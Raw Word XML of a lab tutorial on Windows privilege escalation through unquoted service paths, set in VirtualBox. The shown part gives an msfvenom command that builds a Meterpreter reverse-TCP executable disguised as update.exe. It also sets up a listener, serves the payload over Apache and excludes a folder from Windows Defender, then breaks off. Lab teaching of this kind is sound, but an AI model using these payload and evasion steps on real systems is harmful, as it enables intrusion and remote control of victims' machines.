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47A6" w14:textId="0A651A3B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</w:pPr>
      <w:r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  <w:t xml:space="preserve">Lab  - </w:t>
      </w:r>
      <w:r w:rsidRPr="00E87C6C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Windows Privilege Escalation: Unquoted Service Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ABFD5B" w14:textId="55BAD89C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b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F85E95" w14:textId="5B931FC3" w:rsidR="00EA7C74" w:rsidRDefault="00EA7C74" w:rsidP="00E87C6C">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="2phjq"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="2phjq"/>
        </w:rPr>
        <w:t>The Unquoted Service Path vulnerability arises when a service is created whose path to the service executable contain</w:t>
      </w:r>
      <w:r w:rsidR="00763484">
        <w:rPr>
          <w:rStyle w:val="2phjq"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="2phjq"/>
        </w:rPr>
        <w:t xml:space="preserve"> spaces and is not enclosed within </w:t>
      </w:r>
      <w:r w:rsidR="00C87783">
        <w:rPr>
          <w:rStyle w:val="2phjq"/>
        </w:rPr>
        <w:t>double quotes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="2phjq"/>
        </w:rPr>
        <w:t xml:space="preserve">. If a low privilege user can write to </w:t>
      </w:r>
      <w:r w:rsidR="00C87783">
        <w:rPr>
          <w:rStyle w:val="2phjq"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="2phjq"/>
        </w:rPr>
        <w:t xml:space="preserve"> location along </w:t>
      </w:r>
      <w:r w:rsidR="00763484">
        <w:rPr>
          <w:rStyle w:val="2phjq"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="2phjq"/>
        </w:rPr>
        <w:t>unquoted service path, they could exploit the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED90C71" w14:textId="308E0F94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>The Windows API must assume where to find the referenced application if the path contains spaces and is not enclosed by quotation marks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEBF4A3" w14:textId="6B108185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b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Lab Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C17C954" w14:textId="15158AF6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An installation of VirtualBox on your host machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7345AA9F" w14:textId="79F2A102" w:rsidR="00E87C6C" w:rsidRP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>One updated virtual install of Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A31827D" w14:textId="0A285063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kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">One virtual install of either </w:t>
      </w:r>
      <w:r w:rsidR="00FE4D9D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00E87C6C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">indows 7 </w:t>
      </w:r>
      <w:r w:rsidR="00FE4D9D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidRPr="00E87C6C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13241F85" w14:textId="6010A764" w:rsidR="00E87C6C" w:rsidRDefault="00E87C6C" w:rsidP="00E87C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VirtualBox networking should be set to host networking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4AD7EE" w14:textId="5425DEAE" w:rsidR="00E87C6C" w:rsidRP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87C6C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Start the lab!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDCA748" w14:textId="1C326F63" w:rsidR="00E87C6C" w:rsidRDefault="00E87C6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Ensure your Kali and your Windows target are up running inside of the VirtualBox manager. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2348AADC" w14:textId="4B6AB9DE" w:rsidR="006027F4" w:rsidRPr="006027F4" w:rsidRDefault="006027F4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6027F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Establish a Meterpreter Session with the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086CF08A" w14:textId="407BAD33" w:rsidR="00E26B56" w:rsidRDefault="00E95B8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Log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on to Kali Linux. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E51246A" w14:textId="4F9B6557" w:rsidR="00DE09E0" w:rsidRDefault="00E95B8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On your Kali desktop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create a new folder. Name the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usp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>. Find the new folder on your Kali desktop, right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>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>click on the folder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from the context menu, select Open Terminal Here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFD5247" w14:textId="41E07D8D" w:rsidR="00E26B56" w:rsidRP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E26B56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Find the IP address for your Local Host (LH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB03E6E" w14:textId="62153C36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Open a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new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terminal. Type in ifconfig to find the IP address assigned to your eth0 adapter. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E046E2C" w14:textId="55A7DA48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4B76459" wp14:editId="6C598272">
            <wp:extent cx="5400675" cy="1488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32" cy="14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D34D" w14:textId="051E3926" w:rsidR="00E26B56" w:rsidRDefault="00E26B5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This is my IP address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;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yours will differ. Leave the terminal open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1820FE4A" w14:textId="4BB6F4C3" w:rsidR="00623F01" w:rsidRDefault="00623F01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>Open a</w:t>
      </w:r>
      <w:r w:rsidR="00E26B56">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> second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terminal on your Kali machine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at the prompt, type or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c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opy and paste the following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vsfvenom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script. </w:t>
      </w:r>
      <w:r w:rsidR="00E26B56" w:rsidRPr="0034148B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">Change the IP address for the </w:t>
      </w:r>
      <w:r w:rsidR="0034148B" w:rsidRPr="0034148B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>LHOST to that of your Kali machine.</w:t>
      </w:r>
      <w:r w:rsidR="0034148B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</w:p>
    <w:p w14:paraId="71A8A311" w14:textId="64CC2C72" w:rsidR="00DE09E0" w:rsidRPr="0034148B" w:rsidRDefault="00DE09E0" w:rsidP="0034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  <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pP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msfvenom -p windows/meterpreter/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> -a x86 –platform windows -f exe LHOST=192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00E26B56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56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.</w:t>
      </w:r>
      <w:r w:rsidR="00E26B56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132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 xml:space="preserve"> LPORT=4444 -o /root/Desktop/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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usp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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/u</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE09E0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>pdate.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0813FF4D" w14:textId="24CF4355" w:rsidR="00E95B87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FD3983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3E56E819" wp14:editId="6B4AD1A8">
            <wp:extent cx="5377349" cy="167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775" cy="16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2CE5" w14:textId="472D36AB" w:rsidR="00DE09E0" w:rsidRDefault="00DE09E0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DE09E0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">The command above instructs msfvenom to generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload. The format must be specified as type .exe, and the localhost (LHOST) and local port (LPORT) must be defined. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE09E0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST is the IP address of our attacking Kali Linux machine that we got in the last command, and the LPORT is the port to listen on for a connection from the target once it has been compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207951E4" w14:textId="2C972839" w:rsidR="0034148B" w:rsidRDefault="0034148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I have named the executable in the script </w:t>
      </w:r>
      <w:r w:rsidRPr="0034148B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>update.exe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. You are free to name your executable anything you want. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F973A1" w14:textId="0D60BD4D" w:rsidR="00FD3983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Check your work folder. Inside the work folder is the executable we created. Close the folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B17F398" w14:textId="57E5A863" w:rsidR="00FD3983" w:rsidRDefault="00FD398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34F7B8D" wp14:editId="04BD67BF">
            <wp:extent cx="5295900" cy="2062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57" cy="20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9E1C" w14:textId="3B3321FC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2C4D1A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Create your meterpreter session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F9DBA0" w14:textId="6DA970C3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From your Kali machine, open a new terminal at the console type, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C4D1A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1857E560" w14:textId="387685DA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Choose an exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AB8E53" w14:textId="4CD5111B" w:rsidR="002C4D1A" w:rsidRDefault="002C4D1A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At the MSF6 prompt, type, </w:t>
      </w:r>
      <w:r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use m</w:t>
      </w:r>
      <w:r w:rsidR="004D17F7"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u</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA7C74">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>lti/handler</w:t>
      </w:r>
      <w:r w:rsidRPr="002C4D1A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</w:p>
    <w:p w14:paraId="24FE1B44" w14:textId="7B76C863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901C9A7" wp14:editId="74A1BA58">
            <wp:extent cx="4563112" cy="809738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913" w14:textId="0658E010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Set the payload. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0C3C6" w14:textId="10067476" w:rsidR="004D17F7" w:rsidRDefault="004D17F7" w:rsidP="00E87C6C">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="Strong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prompt, type, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>set payload windows/meterpreter/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="62AE91BB" w14:textId="6E046D46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114B70D5" wp14:editId="1634433E">
            <wp:extent cx="5792008" cy="108600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8C5" w14:textId="5E94A1BA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Set the IP address for your LHOST (Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070D48EC" w14:textId="5F49622D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 type, </w:t>
      </w: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set LHOST &lt;Your Kali’s assigned IP address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246AC4CC" w14:textId="1D4853AF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0494CCEE" wp14:editId="32A13CAD">
            <wp:extent cx="5200650" cy="1191260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126" cy="1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34C" w14:textId="4C3C0CCB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Set the listening port for the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C3B345" w14:textId="78E7190C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At the prompt type, </w:t>
      </w:r>
      <w:r w:rsidRPr="004D17F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B8DFC3" w14:textId="120C41C4" w:rsidR="004D17F7" w:rsidRP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4D17F7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B43B25F" wp14:editId="6633BAB0">
            <wp:extent cx="5943600" cy="1669415"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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6F5" w14:textId="01CA1C91" w:rsidR="004D17F7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Launch the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B69415" w14:textId="78B0C33A" w:rsidR="004D17F7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At the prompt, type, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009E6459">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="00763484">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>—p</w:t>
      </w:r>
      <w:r w:rsidRPr="009E6459">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>ress</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E6459">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> enter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F82E7D6" w14:textId="6E6B19B8" w:rsidR="009E6459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We now have our listener established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC68D13" w14:textId="2EA7387A" w:rsidR="009E6459" w:rsidRDefault="009E645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9E6459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384A4153" wp14:editId="13B8D756">
            <wp:extent cx="4382112" cy="4477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CDC" w14:textId="4E785287" w:rsidR="00B00B85" w:rsidRP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>Start your Apache Web Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A90FD28" w14:textId="7A69679A" w:rsidR="009E6459" w:rsidRDefault="00B00B85" w:rsidP="00E87C6C">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/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Open a new terminal. At the prompt type, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B00B85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>service apache2 start</w:t>
      </w:r>
      <w:r w:rsidR="00763484">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>—p</w:t>
      </w:r>
      <w:r w:rsidRPr="00B00B85">
        <w:t>ress enter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4B4CF5" w14:textId="05F5D08B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05C788F" wp14:editId="5689F7D7">
            <wp:extent cx="3572374" cy="1019317"/>
            <wp:effectExtent l="0" t="0" r="9525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2B61" w14:textId="29232749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Copy the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>vsfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B00B85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 file to your html directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A6D357" w14:textId="6791EA6F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 w:rsidRPr="00B00B85">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">Open your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usp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working folder.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r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>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click on your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>update,exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> file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and from the context menu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select Copy. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BB5A0C" w14:textId="29A4D003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CCAABBB" wp14:editId="22CA378D">
            <wp:extent cx="2924175" cy="1534999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15" cy="154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BDD6" w14:textId="11E2C6BD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From your desktop, click on File System. In the right windowpane, open the var directory. Inside the var directory, open the www directory. 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>In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side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the www directory, open the html directory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—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>Right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-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click in the right </w:t>
      </w:r>
      <w:r w:rsidR="00B75233">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>windowpane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,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and f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rom</w:t>
      </w:r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 the context menu, select paste</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CB6EFC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">.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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="02F12E35" w14:textId="25D05A29" w:rsidR="00B00B85" w:rsidRDefault="00B00B85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25233473" wp14:editId="0E1A4B32">
            <wp:extent cx="3629025" cy="1635617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05" cy="164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8DD1" w14:textId="7055896C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From your Windows 10 target, in the Windows search bar, type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00763484">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>ie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> to open Internet Explorer. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C85DD10" w14:textId="1534583D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052A3B5E" wp14:editId="61FA8F3D">
            <wp:extent cx="2238375" cy="173316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917" cy="174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D99B" w14:textId="52453800" w:rsidR="00CB6EFC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In the address bar of your IE browser, type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, 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 w:rsidRPr="00763484">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>http://&lt;ip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 address of your Kali</w:t>
      </w:r>
      <w:r w:rsidR="000863FC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>/update.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8048E6" w14:textId="21C37510" w:rsidR="00B75233" w:rsidRPr="00B75233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0F616E3" wp14:editId="410AB648">
            <wp:extent cx="4600575" cy="2067674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18" cy="207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157" w14:textId="6A45221E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Cs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000863FC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Make an exclusion for your </w:t>
      </w:r>
      <w:r w:rsidR="00B75233">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">target’s </w:t>
      </w:r>
      <w:r w:rsidRPr="000863FC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>desktop folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EE1F8F" w14:textId="4F3FC9C1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The easiest way to get around Windows Defender is to exclude the folder that contains the payload. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C98937" w14:textId="76C1E588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Click inside the Windows 10 target window.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p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ress the Windows + I key. This brings up Windows settings. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049841F1" w14:textId="762AAEFD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Scroll to the bottom and click on Update and Security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB0621F" w14:textId="5E881446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7BA29442" wp14:editId="7F1F9A95">
            <wp:extent cx="2016484" cy="129540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27" cy="13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E9EB8" w14:textId="3FA9D480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lastRenderedPageBreak/>
        <w:t xml:space="preserve">On the next screen, click on Virus &amp; threat protection. </w:t>
      </w:r>
      <w:r w:rsidR="003002CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">On the next screen under Virus &amp; threat protection, click on Manage settings. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509B720B" w14:textId="714A19F9" w:rsidR="000863FC" w:rsidRDefault="000863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4B551416" wp14:editId="5E19C12A">
            <wp:extent cx="3105150" cy="123185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61" cy="123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5FBD" w14:textId="6B22A684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On the next screen, scroll down u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til you come to, Exclusions.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Then, c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PH" w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>lick on, Add or Remove Exclusions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FFDC76" w14:textId="7BA5AB65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5BD012FC" wp14:editId="4EA8E6DA">
